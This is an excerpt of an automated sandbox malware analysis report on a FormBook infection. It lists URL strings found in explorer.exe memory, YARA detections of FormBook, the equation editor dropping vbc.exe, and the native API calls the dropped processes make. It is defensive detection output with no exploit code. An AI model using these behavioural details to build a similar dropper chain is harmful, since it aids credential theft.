          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2168462228.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2178982212.00000000085C0000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418222 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009600C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00960048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00960078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009607AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009610D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00960060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009601D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0096010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00961148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00961930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02430048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02430060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02430078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024310D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02431148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0243010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024301D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02431930 NtSetContextThread,
